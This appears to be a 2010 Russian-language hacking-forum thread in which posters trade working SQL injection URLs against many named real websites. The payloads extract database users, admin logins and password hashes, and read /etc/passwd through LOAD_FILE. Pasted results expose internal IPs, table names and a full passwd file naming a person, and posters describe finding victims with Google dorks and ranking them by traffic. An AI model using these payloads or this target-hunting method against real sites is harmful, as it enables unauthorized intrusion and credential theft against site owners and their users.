http://www.eurofound.europa.eu/areas/qualityoflife/eurlife/index.php?template=3&radioindic=156+and+2=1+union+select+concat_ws(0x3a 3a3a3a3a3a,user(),version()),2%23&idDomain=12
http://fantasysports.comcast.net/nba/player.php?tqid=1113&type=news&nid=39031'+and+2=1+union+select+user(),concat_ws(0 x3a,user,password,host,file_priv),3,4+from+mysql.u ser+limit+32,1%23
http://aidscience.org/Country.asp?ID=3+and+2=1+union+select+1,2,@@versio n,4,5,6,7,8--
http://www.fieldtripearth.org/media.xml?division_id=2&category_id=1))+union+select+version()%23
http://www.timewastersguide.com/view.php?id=318+and+2=1+union+select+1,version(),3 ,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18%23
http://okdail.infobox.ru/ru/railway/trainstimetable.php?id=3+and+2=1+union+select+1,2, unhex(hex(version())),4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18%23
http://www.k4dre.infobox.ru/msg_list.php?forum_id=6+and+2=1+union+select+1,ver sion(),3,4%23
http://board.ugmk.info/?b=1224406451+and+substring(version(),1,1)=5
hek.me with love
[code]http://ul-ivanovka-sosh.ru/index.php?cat=3+union+select+concat(table_name,0x3 a)+from+information_schema.tables
Открываем сурс.....
http://86132.ru/kabinet.php
' or 1=1/*
http://muzzzon.com/taxonomy_menu/1/11)%20and%20row(1,1)%3E(select%20count(*),concat(v ersion(),floor(rand(0)*2))%20a%20from%20node%20gro up%20by%20a%23
database():muzzzon_base1
Версия:5
Добавлено через 51 час 23 минуты
http://www.edu.nsu.ru/new_detail.php?new_id=-1
http://www.edu.nsu.ru/new_detail.php?new_id=-1+union+select+1,2,3--
ДБ:noos
Версия:4.1.20
Юзер:nooser@localhost
GinTonic
01.03.2010, 08:40
http://poopzi.com/index.php?id=-7942+union+select+1,version(),user(),database(),5, 6--
5.1.42
poopzi@localhost
wwwpoopzicom
BastardFromHell
01.03.2010, 23:44
http://lipetskcity.ru/lipetsk/menu.php?i=1&page=page_1_5.php&text_pod_menu=pic2&id_rep=16%20AND%201=2%20UNION%20SELECT%201,2,3,4,5
дальшы впадлу лесть
ctbscopiers.com
http://ctbscopiers.com/productdetails.php?pid=-146+UNION+SELECT+1,2,3,concat(version(),0x3a,0x3a, user(),0x3a,0x3a,database()),5,6,7,8,9,10,11,12,13 ,14,15+--+
Version: 4.0.27-max-log
User: ctbscopiers@208.109.138.80
Database: ctbscopiers
OS: Linux
taiwanguts.com
http://www.taiwanguts.com/news.php?id=-298+union+select+1,concat(version(),0x3a,0x3a,user (),0x3a,0x3a,database()),3,4,5,6+--+
Version: 5.1.43-log
User: iseigthr_ben@localhost
Database: iseigthr_freddyaction
OS: Linux
P.S. Комментарий к taiwanguts.com: true ачатовцам не обязательно знать китайский язык, дабы проводить SQL-injection :D :D
..::TROYAN::..
04.03.2010, 01:16
http://www.pornfreeee.com/webmaster/showplugs.php?domain=-1%27+union+select+1,concat_ws%280x3a,user%28%29,da tabase%28%29,version%28%29%29,3,4,5,6--+
pornfreeee@localhost:pornfreeee_phpld:5.0.45
[Feldmarschall]
04.03.2010, 05:24
www.wizard-soft.com
http://www.wizard-soft.com/cpuspeed/showcpu.php?id=-1%20UNION%20SELECT%201,version%28%29,3,4,5,6,7,8,9 ,10,11,12,13,14--
VERSION: 5.0.81-community - PHP/5.2.9
DATABASE: wizard4_cpuspeed
Current User: wizard4_cpuuser@localhost
www.webturizm.ru
Database: webturizm
User: webturizm@localhost
Version: 5.0.22
http://www.webturizm.ru/photo/country_photos.php?country_id=-1044+union+select+1,concat_ws%280x3a,login,passwor d%29+from+webturizm.tfirm+limit%201,1+--+
http://www.etageclub.ru/gallery_about.htm?id=40+UNION+SELECT+1,2,3,4,conca t%28version%28%29,0x3a,0x3a,%20%20user%28%29,0x3a, 0x3a,database%28%29%29,6--
5.0.77-log::dbu_subbox_5@192.168.6.83::db_subbox_14
http://jrandrachel.com/wordpress/wp-content/plugins/photoracer/viewimg.php?id=-4+union+select+1,concat_ws(user_login,0x3a,user_pa ss)+from+wp_users--
http://nudephotocontest.com/wp-content/plugins/photoracer/viewimg.php?id=-4+union+select+1,concat_ws(user_pass,0x3a,user_log in)+from+wp_users--
http://www.levelesyeux.com/wp-content/plugins/photoracer/viewimg.php?id=-2+union+select+1,concat_ws(user_login,0x3a,user_pa ss)+from+wp_users--
http://www.cagou.com/blog/wp-content/plugins/photoracer/viewimg.php?id=-31+union+select+1,concat_ws(user_login,0x3a,user_p ass)+from+wp_users--
http://www.chicasrider.cl/wp-content/plugins/photoracer/viewimg.php?id=-10+union+select+1,concat_ws(user_login,0x3a,user_p ass)+from+wp_users--
http://my.brilliantspot.com/wp_my/wp-content/plugins/photoracer/viewimg.php?id=-30+union+select+1,concat_ws(user_login,0x3a,user_p ass)+from+wp_users--
http://www.ilovepasta.it/pasta/wp-content/plugins/photoracer/viewimg.php?id=-2+union+select+1,concat_ws(user_login,0x3a,user_pa ss)+from+wp_users--
http://tronderglass.no/pfNewsDetail.php?NewsId=-12+union+select+1,2,group_concat(TABLE_NAME),4+fro m+information_schema.tables--
http://powersimages.com/wp-content/plugins/photoracer/viewimg.php?id=-30+union+select+1,concat_ws%28user_login,0x3a,user _pass%29+from+wp_users--
http://www.intothepicture.com/wp-content/plugins/photoracer/viewimg.php?id=-30+union+select+1,concat_ws%28user_login,0x3a,user _pass%29+from+wp_users--
=)
http://worksystem.sourceforge.net/worksystem_4_0_30/module/catalogue/view_catalogue.php?select_catalogue=1+and+1=2+unio n+select+1,2,3,4,5,6,version%28%29,user(),9,10+--+&work_url=04eaaac39da09ffd351cf366b0bd70aa#
w101493rw@172.29.30.53 | 5.0.51a-log
http://www.artpeinture.fr/work/module/catalogue/view_catalogue.php?select_catalogue=1+and+1=2++uni on+select+1,version(),3,user(),5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23+--+&work_url=04eaaac39da09ffd351cf366b0bd70aa#
artpeintqtarata@10.0.105.14 | 5.0.90-log
http://www.immodefrancecotedazur.com/work/module/news/view_news.php?select_news=12+union+select+1,user() ,3,database(),version(),6,7,8,9,10,11,12+--+
icadeadb2009@10.0.84.51 | 5.0.90-log
http://www.alainmaillet.com/work/module/forum/detailforum.php?select_forum=3+union+select+1,2,us er(),4,version(),6,7,8+--+&work_url=2fa5af6c22#
dbo263010652@212.227.29.138 | 5.0.81-log
Подробности тут (http://forum.antichat.ru/showpost.php?p=1956497&postcount=332)
http://www.graycell.ru/mask/%EA'+UNION+SELECT+1,concat_ws(':',USER(),DATABASE( ),VERSION())+UNION+SELECT+1,2+'
GRAYCELL@LOCALHOST:WWWGRAYCELLRU:5.0.70
Таблы немогу прочитать, или доступа нет или руки кривые...
http://www.graycell.ru/mask/%EA'+UNION+SELECT+1,LOAD_FILE('/etc/passwd')+UNION+SELECT+1,2+'
BIN:X:1:1:BIN:/BIN:/BIN/FALSE
DAEMON:X:2:2:DAEMON:/SBIN:/BIN/FALSE
ADM:X:3:4:ADM:/VAR/ADM:/BIN/FALSE
LP:X:4:7:LP:/VAR/SPOOL/LPD:/BIN/FALSE
SYNC:X:5:0:SYNC:/SBIN:/BIN/SYNC
SHUTDOWN:X:6:0:SHUTDOWN:/SBIN:/SBIN/SHUTDOWN
HALT:X:7:0:HALT:/SBIN:/SBIN/HALT
MAIL:X:8:12:MAIL:/VAR/SPOOL/MAIL:/BIN/FALSE
NEWS:X:9:13:NEWS:/USR/LIB/NEWS:/BIN/FALSE
UUCP:X:10:14:UUCP:/VAR/SPOOL/UUCPPUBLIC:/BIN/FALSE
OPERATOR:X:11:0:OPERATOR:/ROOT:/BIN/BASH
MAN:X:13:15:MAN:/USR/SHARE/MAN:/BIN/FALSE
POSTMASTER:X:14:12:POSTMASTER:/VAR/SPOOL/MAIL:/BIN/FALSE
POSTGRES:X:70:70::/VAR/LIB/POSTGRESQL:/BIN/BASH
NUT:X:84:84:NUT:/VAR/STATE/NUT:/BIN/FALSE
POSTFIX:X:207:207:POSTFIX:/VAR/SPOOL/POSTFIX:/BIN/FALSE
SMMSP:X:209:209:SMMSP:/VAR/SPOOL/MQUEUE:/BIN/FALSE
PORTAGE:X:250:250:PORTAGE:/VAR/TMP/PORTAGE:/BIN/FALSE
NOBODY:X:65534:65534:NOBODY:/:/BIN/FALSE
SSHD:X:22:22:ADDED BY PORTAGE FOR OPENSSH:/VAR/EMPTY:/USR/SBIN/NOLOGIN
MYSQL:X:60:60:ADDED BY PORTAGE FOR MYSQL:/DEV/NULL:/SBIN/NOLOGIN
CRON:X:16:16:ADDED BY PORTAGE FOR CRONBASE:/VAR/SPOOL/CRON:/SBIN/NOLOGIN
FTP:X:21:21:ADDED BY PORTAGE FOR FTPBASE:/HOME/FTP:/SBIN/NOLOGIN
PROFTPD:X:101:407:ADDED BY PORTAGE FOR PROFTPD:/DEV/NULL:/SBIN/NOLOGIN
APACHE:X:81:81:ADDED BY PORTAGE FOR APACHE:/VAR/WWW:/SBIN/NOLOGIN
WEBMASTER:X:1000:1000:ALEKSEY PISKUNOV:/HOME/WEBMASTER:/BIN/BASH
DOVECOT:X:97:97:ADDED BY PORTAGE FOR DOVECOT:/DEV/NULL:/SBIN/NOLOGIN
RPC:X:111:111:ADDED BY PORTAGE FOR PORTMAP:/DEV/NULL:/SBIN/NOLOGIN
http://www.aquafeed.com.tw/big5/new_detail.php?id=-2+UNION+SELECT+1,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x 7873716C696E6A626567696E,LOAD_FILE(0x2F6574632F706 173737764),0x7873716C696E6A656E64),0x71),0x71),3,4 ,5,6,7,8,9,10,11,12,13,14,15,16,17
Database Version: 5.0.16-log
Database name: aquafeed_db
User name: WebSiteOwner@localhost
http://greenconsultancy.com/print_view.php?pageType=page&id=-1'+union+select+1,concat_ws(0x3a,user(),version(), database()),3,4,5,6,7,8,9--+
greenconsult@192.168.0.8:5.0.58-enterprise-gpl:greenconsult
http://www.sflcn.com/story.php?id=-8069+union+select+1,2,concat_ws(0x3a,user(),versio n(),database()),4,5,6,7,8
bahamagi_sfcndat@localhost:5.1.30:bahamagi_sfcnDat a
http://www.clockmarket.ru/catalog/show_large.php?clock_id=-1452+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,3 1,32,33,34,concat_ws(0x3a,user(),version(),databas e()),36,37,38,39&popup=1
c2_clockmarket@localhost:5.0.75-0ubuntu10.2:c2_clockmarket
http://mmorpgtop.woano.lv/index.php?do=out&id=-1+union+/*!select*/+concat_ws(0x3a,version(),database(),user())
5.0.89-community-log:mmorpg_mmorpgtop:mmorpg_purgen@localhost
http://www.voiphouse.co.uk/en/shop/index.php?cat_id=-912+union+select+1,concat_ws%280x2f,user,password% 29+from+mysql.user--
Financier
06.03.2010, 13:56
http://www.hatjecantz.de/controller.php?cmd=kunstlexikon&id=9999+order+by+27--
http://www.hatjecantz.de/controller.php?cmd=kunstlexikon&id=9999+union+select+1,2,3,4,5,version(),7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
5.0.51a-24+lenny2
http://www.hatjecantz.de/controller.php?cmd=kunstlexikon&id=9999+union+select+1,2,3,4,5,table_name,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2 7+from+information_schema.tables+limit+83,1--
Artinfo
Artinfo_Startseite
Artinfo_Titel
Bestseller
Buchtipp
Buchtipp_Startseite
CE_Angebote
Download
Empfehlung_Titel
Galerie_Startseite
Highlight
Interviews
Interviews_Startseite_Sort
Interviews_Titel
Kuenstler
Links
Neu
Neuerscheinung
News
News_Startseite_Sort
News_Titel
OrderItems
Orders
Partner
Person
Schlagworte_de
Schlagworte_en
Titellinks
VI_ADR_Anschrift
VI_ADR_Anschrift_1267664404281
VI_ADR_Anschrift_1267750804304
VI_ADR_Anschrift_1267837203272
VI_ADR_Firma
VI_ADR_Firma_1267664404281
VI_ADR_Firma_1267750804304
VI_ADR_Firma_1267837203272
VI_ADR_Person
VI_ADR_Person_1267664404281
VI_ADR_Person_1267750804304
VI_ADR_Person_1267837203272
VI_AdressenTexte
VI_AdressenTexte_1267664404281
VI_AdressenTexte_1267750804304
VI_AdressenTexte_1267837203272
VI_Bilder
VI_Bilder_1267664404281
VI_Bilder_1267750804304
VI_Bilder_1267837203272
VI_Einbandarten
VI_Einbandarten_1267664404281
VI_Einbandarten_1267750804304
VI_Einbandarten_1267837203272
VI_Termine
VI_Termine_1267664404281
VI_Termine_1267750804304
VI_Termine_1267837203272
VI_Titel
VI_TitelAuflagen
VI_TitelAuflagen_1267664404281
VI_TitelAuflagen_1267750804304
VI_TitelAuflagen_1267837203272
VI_TitelMerkmale
VI_TitelMerkmale_1267664404281
VI_TitelMerkmale_1267750804304
VI_TitelMerkmale_1267837203272
VI_TitelPreise
VI_TitelPreise_1267664404281
и т.д. надоело=)
http://www.hatjecantz.de/robots.txt
Disallow: /admin/
Disallow: /wwwstats/
[Undead]
06.03.2010, 14:08
http://www.democracy.ru/article.php?id=1447+union+select+1,2,TABLE_NAME,4, 5,6,7,8,9,10,11,12,13,14,version(),16+FROM+INFORMA TION_SCHEMA.TABLES+LIMIT+1,1--
5.0.51a-24+lenny2
http://police.am/page.php?section=pet&lenguige=am&id_menu=1+and+1=1
blind :)
http://www.avangard.am/index/main.php?id=1781+and+1=0+union+select+1,column_nam e,3,4,5,6,7,8,9,10+from+information_schema.columns +where+table_name=CHAR(97,%20100,%20109,%20105,%20 110)/*
ttp://www.avangard.am/index/main.php?id=1781+and+1=0+union+select+1,concat(use r,char(58),password),3,4,5,6,7,8,9,10+from+mysql.u ser/*
the same site
http://www.lusamut.net/level0_.php?cat_=-21+and+1=0+union+select+concat(username,char(58),p assword),2,3+from+users&slog=22
look at the <>title
http://www.armjob.am/resume.php?id=11'+union+select+1,2,concat(email_us er,char(58),pass_user)+from+job_user/*
http://www.vales.by/news.php?new_id=-88+union+select+1,user_password,3,4,5,6,username,8 +FROM+phpbb_users+LIMIT+1,1+--+
http://ssa-bel.com/page.php?id=2%27+and+1=2+union+select+1,concat(ver sion(),0x3a,user(),0x3a,database()),3+--+
5.0.45-log:ssa_bel_com@localhost:ssa_bel_com
Гугл занимается такой же деятельностью как и мы=)
Вбил inurl: page.php?id= и искал сираницы из Беларуси. На второй странице в названии вижу число 6. Меня это смутило. Ссылка на сайт:
http://www.google.com.by/url?sa=t&source=web&ct=res&cd=16&ved=0CBAQFjAFOAo&url=http%3A%2F%2Fwww.plenki.by%2Fnews-page.php%3Fid%3D-105%2Bunion%2Bselect%2B0%2C1%2C2%2C3%2C4%2Cversion ()%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2 C16%2C17%2C18%2C19&rct=j&q=inurl:page.php%3Fid%3D&ei=0b-WS5XGDqTmnAOS3PC8Cw&usg=AFQjCNGz7uqgZpcTnPhlyMR41Ydo6PNBFA
а сам запрос:
http://www.google.com.by/#hl=ru&cr=countryBY&q=inurl:page.php%3Fid%3D&start=10&sa=N&fp=8c7f2520348b6730
Очень подняло настроение=)
http://enjoy.md/category.php?id=-2+UNION+SELECT%201,concat_ws(0x3a,NAME,EMAIL,REMAR K,ADDRESS,LOGIN,PASSWORD,STATUS),3+FROM+user+LIMIT +54,1+--+
P.S: Не понял можно ли выкладывать в таком виде, если нет приношу извинения, исправлюсь.
http://www.rubikon-band.ru/?vrb=newslist&acl=-49%27+UNION+SELECT+1,2,concat_ws%280x3a3a,version% 28%29,user%28%29,database%28%29,@@version_compile_ os%29,4,5,6--+
DezMond™
11.03.2010, 12:19
omedu.ru официальный сайт поддержки ЕГЭ в Омской области. ПР4 ТИЦ 100
http://www.omedu.ru/?act=download&id=55&id_downloads_cat=-40+union+select+1,2,3,4,5,concat_ws(0x3a3a,login,p assword,email),7,8,9,10,11+from+user+--+
stereopravda.ru ПР3 ТИЦ 50
http://www.stereopravda.ru/tov.php?cat=11&subcat=48&id=-96+uNIon+sELEct+1,2,3,user(),5,6,7,8,9,10,11+membe rs+--+
bicopy.ru пр1
http://bicopy.ru/news.php?id=-1+union+select+1,2,3,4,5,6,7,8,9+--+
bologna.mgimo.ru ПР 6 ТИЦ 100
http://bologna.mgimo.ru/news.php?doc_id=310'+union+select+1,2,3,4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27,28,29,30,31,32,33,34,35+from+users+--+
tanganyika.ru ПР4 ТИЦ 190
http://www.tanganyika.ru/gendesc.php?&gid=-20+uNIon+sELEct+1,database(),3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21+--+
lakra-products.ru
http://lakra-products.ru/page.php?page=catalog&cat_id=-2.2+union+select+1,2,3,4,table_name,6,7,8,9,10,11, 12+from+information_schema.tables+--+
svarng.ru ПР3 ТИЦ30
http://www.svarng.ru/cat.htm?id=1+union+select+1,2,3,4,5,6,file_priv,8, 9,10,11,12,13,14,15,16+from+mysql.user+--+
zzk.lv
http://www.zzk.lv/rus/tovari/?cat=14&id=-81+union+select+1,2,3,4,5,concat_ws(0x3a3a,usernam e,password,level,gruppa,email),7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30, 31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47 ,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,6 4,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80, 81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97 ,98,99,100,101,102,103,104,105,106,107,108,109,110 ,111,112,113,114,115,116,117,118,119,120,121,122,1 23,124,125+from+ins_users+--+
massager.net.ua ПР2
http://www.massager.net.ua/index.php?page=catalog&cat_id=-4+uNIon+sELEct+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19+--+
sibkeramika.ru
http://sibkeramika.ru/index.php?m=shop&page=OpenBigImage&good_id=2&image_id=-84'+union+select+1,2,3,4,5,concat_ws(0x3a3a,user_i d,email,password,access_site,group_id),7,8+from+us ers+limit+1,1+--+
ats-telecomserv.ru ПР2 ТИЦ40
http://ats-telecomserv.ru/?page=Price&ProductCat=-7+UnIon+seLEct+1,2,group_concat(table_name),4,5,6, 7+from+information_schema.tables+group+by+table_sc hema+--+
ls-wheels.com ПР3 ТИЦ40
http://www.ls-wheels.com/cat/goods.php?id=-25+union+select+1,2,3,concat_ws(0x3a3a,Code,T_Code ,Login,Passwd,FIO,www,EMail),5,6+frOm+ls_dw_Users+--+&raz=1'
ru-board.com ПР4 ТИЦ 850
http://www.ru-board.com/new/pollBooth.php?op=results&pollID=-2+uNIon+sELEct+concat_ws(0x3a3a,aid,name,pwd,radmi nsuper),2+from+nuke_authors+--+&screen=4&cat_id=65&viewtype=&action=view&lng=ru
solmaz.info ПР2
http://www.solmaz.info/gallery.php?photo_id=-611'+union+select+1,2,3,4,5,6,7,8,9+from+authors+--+&screen=4&cat_id=65&viewtype=&action=view&lng=ru
metallurg-nk.ru ПР4 ТИЦ 550
http://www.metallurg-nk.ru/media/index.php?cat=video&gallery_id=-93'+union+Select+1,2,3,4,5,6,7,8+from+information_ schema.tables+--+
sakha-info.ru ПР4 ТИЦ 50
http://www.sakha-info.ru/?news=-3326'+uNIon+sELEct+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23+--+
replicawheel.ru
http://www.replicawheel.ru/cat/goods.php?id=next&pos=236&T_Code=-64+union+select+1,2,3,4,5,6+--+
delotex.ru ПР1 ТИЦ20
http://www.delotex.ru/cat/?id=40+union+select+1,2,user(),4,5,6,7+--+
iberoasia.com
http://www.iberoasia.com/seccao.php?seccao=-7'+union+select+1,concat_ws(0x3a3a,user,nome,email ,password),3+from+cliente+--+
aces.pt ПР6
http://www.aces.pt/resultado.php?concelho=-1'+union+select+1,table_name,3,4,5,6+from+informat ion_schema.tables+--+&zona=§or=8&nome=&morada=&pesquisa_avancada=Pesquisar
beni.ru ПР4 ТИЦ60
http://www.beni.ru/?part=28'+uNIon+sELEct+1,2,3,4,5,6,7,8+--+&a=cat&page=3'
yarkercher.ru ПР3 ТИЦ30
http://www.yarkercher.ru/?id=4&cat_id=-4+uNIon+sELEct+1,2,'test',4,5,6+--+
genza.ru ПР3 ТИЦ20
http://www.genza.ru/?p=rc&cat=boards&id=-7+uNIon+sELEct+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19+--+
kazak-volga.ru ПР3 ТИЦ20
http://www.kazak-volga.ru/index.php?cat_id=-76+union+select+1,2,3,4+--+
pro-coffee.ru ПР2 ТИЦ20
http://www.pro-coffee.ru/index.php?ActType=good&id=-25+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17+--+
uzbektours.com ПР2 ТИЦ10
http://www.uzbektours.com/main.php?nu=-60+union+select+pass+from+users+--+
satstyle.ru ПР2 ТИЦ10
http://satstyle.ru/index.php?goto=catalog_item&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11+--+
tsp-shop.ru ТИЦ100
http://www.tsp-shop.ru/vendors/?vendor=-31+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13+--+
scandidom.ru ПР3 ТИЦ20
http://www.scandidom.ru/?part=show§ion=kley&elementid=-19+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5+--+
rrc.nahabino-centr.ru ПР4 ТИЦ40
http://www.rrc.nahabino-centr.ru/index.php?p=-9+union+select+1,2,3,4+--+
nahabino-centr.ru ПР4 ТИЦ70
http://www.nahabino-centr.ru/news/?id=-397+union+select+1,2,3,4,5,6+--+
master-aav.ru ПР4 ТИЦ180
http://master-aav.ru/katalog.php?cat=-4+union+select+1,2,3,4,5+--+
i-t-c.ru ПР3 ТИЦ50
http://www.i-t-c.ru/index.php?id=552+union+select+1,2,3,concat_ws(0x3a 3a,login,password,name),5+from+user+--+
media.worldpolitics.ru
http://media.worldpolitics.ru/index.php?action=cat_list&cat_id=-15+union+select+1,2,3,4,5+from+users+--+
adipro.ru ПР2 ТИЦ10
http://www.adipro.ru/lib.php?id=-31+union+select+1,2,3,concat_Ws(0x3a3a,login,passw ),5+from+users+limit+2,1+--+
ekokuhni.ru ПР4 ТИЦ325
http://www.ekokuhni.ru/?a=cat&id=-95'+uNIon+sELect+1,2,3,unhex(hex(user())),5,6,7,8, 9,10,11,12,13,14,15+--+
fable.net.ru ТИЦ 40
http://fable.net.ru/modules.php?name=FAQ&myfaq=yes&id_cat=1'+union+select+concat_ws(0x3a3a,aid,name,e mail,pwd,radminsuper)+from+spnuke_authors+--+
irbis.spb.ru ПР4 ТИЦ700
http://www.irbis.spb.ru/catalog.php?cat_id=&cat=-45+UnIoN+SElecT+1,2,3,4+--+
novokubansk.info ПР3 ТИЦ50
http://www.novokubansk.info/lenta.php?postid=-1491+union+select+1,2,3,4,5,6,7,8,9+--+#top
dospel.by ПР3 ТИЦ10
http://www.dospel.by/catalog2.php?id=106&cat=-28+union+select+1,concat_ws(0x3a3a,login,pass),3,4 ,5,6,7+from+admins+--+
gandilyan.ru ПР3 ТИЦ10
http://www.gandilyan.ru/index.php?action=cat_show&ordby=firm&type_id=-61+union+select+1,2,concat_ws(0x3a3a,admin_login,a dmin_pass),4,5+from+admin+--+
emmaljunga-rus.ru ПР3 ТИЦ10
http://www.emmaljunga-rus.ru/index.php?action=cat_show&ordby=firm&type_id=-87+union+select+1,2,concat_ws(0x3a3a,admin_login,a dmin_pass),4,5+from+admin+--+
proindigo.ru
http://www.proindigo.ru/photos.php?album=-28+union+select+1,2,3+from+information_schema.tabl es+--+
vladtv.ru ПР5 ТИЦ220
http://www.vladtv.ru/show.php?id=-2071'+union+select+1,2,unhex(hex(concat_ws(0x3a3a, user_email,user_id,user_password))),4,5,6,7,8,9,10 ,11,12,13+from+phpbb_users+limit+2,1+--+
bougiesland.com ПР4 ТИЦ10
http://www.bougiesland.com/boutique.php?mode=CitListe&CitCatId=7+union+select+1,2,3,4,user()+/*+
mirabab.fr ПР2
http://www.mirabab.fr/product_desc.php?id=-9110+union+select+1,2,database(),4,5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+--+
sfsp.fr ПР6
http://www.sfsp.fr/flash_email/index.php?cid=-86+union+select+concat_ws(0x3a3a,id_administrateur ,login,mot_passe,profil,nom,prenom,telephone,email ),2,3,4+from+administrateurs+--+
crd-international.com ПР4
http://www.crd-international.com/news.php?id=-161+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,concat_Ws(0x3a3a,Util_Id,util_Civ,Util_Prenom,U til_Nom,Util_Login,Util_Pass,Util_Groupe),17,18,19 ,20,21,22,23,24,25,26,27,28,29,30,31,32+from+utili sateur+limit+1,1+--+
dmo.or.id ПР6
http://www.dmo.or.id/content.php?section=-65+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14+--+
ronjonesinsurance.com
http://www.ronjonesinsurance.com/content.php?section=News%20And%20Announcements&contentid=-7'+union+select+1+from+information_schema.tables+--+
proclinic.ru ПР1 ТИЦ10
http://www.proclinic.ru/product_desc.php?id=-869+union+select+1+--+
selectscales.co.uk ПР2 ТИЦ10
http://selectscales.co.uk/product_desc.php?id=-18+union+select+1,2,3,4,concat_ws(0x3a3a,admin_id, admin_firstname,admin_lastname,admin_email_address ,admin_password,admin_type),6,7,8,9,10,11,12,13,14 ,15,16,17+from+admin+--+
beautifulmirrors.com
http://www.beautifulmirrors.com/product_desc.php?id=-1066+union+select+1,2,3,concat_ws(0x3a3a,admin_id, admin_firstname,admin_lastname,admin_email_address ,admin_password,admin_type),5,6,7,8,9,10,11,12,13, 14,15+from+admin+--+
thebids.info
http://thebids.info/product_desc.php?id=-19+uNIon+sELEct+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34,35+--+
direct-auctions-mijas-costa.com
http://direct-auctions-mijas-costa.com/product_desc.php?id=-128+union+select+1,2,concat_ws(0x3a3a,admin_email, username_len,pwd_len,site_root),4,5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30,31,32,33,34,35,36,37+from+sbauctions_config +--+
music-auctions.net
http://www.music-auctions.net/product_desc.php?id=-11+union+select+1,2,concat_ws(0x3a3a,concat_ws(0x3 a3a,id,admin_name,pwd)),4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,3 1,32,33,34,35,36+from+freetplauctions_admin+--+
puntoaste.it
http://www.puntoaste.it/product_desc.php?id=-758+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 ,32,33,34,35+--+
goianiavendas.com
http://www.goianiavendas.com/product_desc.php?id=-298+union+select+1,2,concat_ws(0x3a3a,username,pwd ),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, 22,23,24,25,26+from+sbclassified_members+--+
maisonfranceconfort.fr
http://www.maisonfranceconfort.fr/fr/societe.php?marque=-358+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 +--+
kalli.lulu-en-furie.be
http://kalli.lulu-en-furie.be/index.php?viewmode=single&blogid=-508'+union+select+1,2,3,4,5,6,7+--+
kalli.fr
http://www.kalli.fr/index.php?viewmode=cat&cat=-4'+union+select+1,2,3,4,5,6,7+--+
ish-lyon.cnrs.fr ПР6 ТИЦ10
http://www.ish-lyon.cnrs.fr/Annuaire/Annuaire_Personne_Fiche_fr.php?ID=-996+uNIon+sELEct+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 ,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,4 8+--+
la-bnbox.fr ПР2
http://la-bnbox.fr/cahier.php?cid=-299+union+select+1,2,3,4,5,database(),7,8,9,10,11, 12+--+
liendusang.com ПР1
http://www.liendusang.com/actualite.php?id=-341+union+select+1,2,3,4,5,concat_ws(0x3a3a,userna me,user_password,user_email,user_type),7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21+from+forum_users+/*+&titre=Le%20Grand%20Crois%C3%A9%20:%20Une%20offrand e%20%C3%A0%20la%20d%C3%A9mence%20fervente%20!
faoug.ch ПР5 ТИЦ10
http://www.faoug.ch/index.php?mh=Actualit%E9s&menu=Calendrier&smenu=Les%20dates%20%E0%20venir&id=-112'+uNIon+sELEct+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16+--+
organisme-formation.fr ПР1
http://www.organisme-formation.fr/cv.php?cid=-6+union+select+1,2,3+--+
ieti.fr ПР4 ТИЦ10
http://www.ieti.fr/xoops/modules/bamagalerie3/viewcat.php?id=29'&cid=-14+union+select+1,2,3,4,database(),6,7,8,9,10+--+&min=0&orderby=titreA&show=
malkir.fr
http://www.malkir.fr/photographies.php?id=-4805'+union+select+1,2,concat_ws(0x3a3a,id,usernam e,password),4,5,6,7,8,9+from+staff+--+
universite-dijon.fr
http://www.universite-dijon.fr/index/front_office/index_co.php?site_id=120&bg=2&rid=780&cid=-2176+UniON+SEleCT+1,2,3,4,5,6,7,8,9,10,11,12+/*+
flowercampings.com ПР3 ТИЦ10
http://www.flowercampings.com/fr/liste_camping-Bretagne-Normandie.htm?ref=-14+union+select+1,2,3+--+
_eXorcist_
12.03.2010, 10:09
Website : http://wdfw.wa.gov/lands/water_access/search/mobile_site.php?searchby=FacilityID+and+1=0+
Database : phplistdb
Table : phplist_admin
loginname:password:passwordchanged:superuser:
